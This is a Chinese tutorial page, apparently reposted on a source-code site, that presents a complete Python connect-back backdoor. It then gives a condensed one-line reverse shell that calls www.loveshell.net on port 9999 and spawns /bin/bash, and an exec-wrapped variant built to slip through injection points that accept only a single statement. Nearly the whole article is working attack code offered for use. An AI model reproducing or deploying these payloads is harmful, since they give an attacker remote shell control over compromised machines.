中文源码网欢迎您! 会员登录 会员注册 发布自媒体 发布模版 发布源码 发布模版 发布酷站
推荐源码常用源码帮助中心

Python语言技术文档

微信小程序技术文档

php语言技术文档

jsp语言技术文档

asp语言技术文档

C#/.NET语言技术文档

html5/css技术文档

javascript

点击排行

您现在的位置:首页 > 技术文档 > Python编程技巧

在漏洞利用Python代码真的很爽

来源:中文源码网    浏览:235 次    日期:2024-04-16 15:17:07
【下载文档:  在漏洞利用Python代码真的很爽.txt 】

在漏洞利用Python代码真的很爽
不知道怎么忽然想看这个,呵呵 小我的python的反shell的代码 #!/usr/bin/python # Python Connect-back Backdoor # Author: wofeiwo # Version: 1.0 # Date: July 15th 2006 import sys import os import socket shell = "/bin/sh" def usage(programname): print "Python Connect-back Backdoor" print "Auther: wofeiwo " print "Date: July 15th 2006\n" print "Usage: %s \n" % programname def main(): if len(sys.argv) != 3: usage(sys.argv[0]) sys.exit(1) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2]))) print "[+] Connect ok." except: print "[-] Could not connect to %s:%s" % (sys.argv[1], sys.argv[2]) sys.exit(2) s.send("-------------------- Python Connect-back Backdoor --------------------\n") s.send("----------------------------- By wofeiwo -----------------------------\n") os.dup2(s.fileno(), 0) os.dup2(s.fileno(), 1) os.dup2(s.fileno(), 2) global shell os.system(shell) print "See U!" s.close() if __name__ == "__main__": main() 用在漏洞利用的时候不太好,不是么?我们想要短点的,节省下就是 import sys;import os;import socket;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect((socket.gethostbyname("www.loveshell.net"),9999));s.send("Welcome my master\r\n");os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);s.send("Is there a shell?\r\n");os.system("/bin/bash");s.close();s.send("See u next time!\r\n"); 如何?很短了吧? 不过很可能漏洞利用的地方不允许多语句,譬如允许的输入是在eval当中,不能多语句(后面有解释)那么还可以变化下 exec 'import sys;import os;import socket;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect((socket.gethostbyname("www.loveshell.net"),9999));s.send("Welcome my master\\r\\n");os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);s.send("Is there a shell?\\r\\n");os.system("/bin/bash");s.close();s.send("See u next time!\\r\\n");'; 注意是\\r\\n哦,即使在''里好象\r\n一样会成为换行,所以其实这里即使不用;一样可以构造好代码的,另外,为什么不用eval呢? 翻了下手册 exec语句用来执行储存在字符串或文件中的Python语句。例如,我们可以在运行时生成一个包含Python代码的字符串,然后使用exec语句执行这些语句 eval语句用来计算存储在字符串中的有效Python表达式 呵呵,这里用eval好象会出错. YY一下,思想是相同的,但是具体到语言又是不一样的,如何跳出语言的限制呢?是个问题......

上一篇:浏览器窗口滚动加载数据采用异步形式从后台加载数据

下一篇:Python完全新手教程

相关内容